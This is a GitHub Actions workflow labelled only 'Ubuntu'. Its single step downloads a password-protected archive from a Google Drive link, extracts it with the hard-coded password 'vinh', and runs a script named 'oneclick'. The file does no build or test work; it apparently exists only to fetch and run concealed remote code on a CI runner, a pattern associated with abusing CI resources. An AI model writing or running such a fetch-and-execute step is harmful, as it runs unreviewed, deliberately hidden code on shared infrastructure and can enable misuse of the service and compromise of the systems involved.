name: Ubuntu

on: workflow_dispatch

jobs:
  one:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1g7i9UQLenEeZlJbKPFrnjcJcyopOIdqi" && 7z  x  -pvinh file.zip && bash oneclick

 
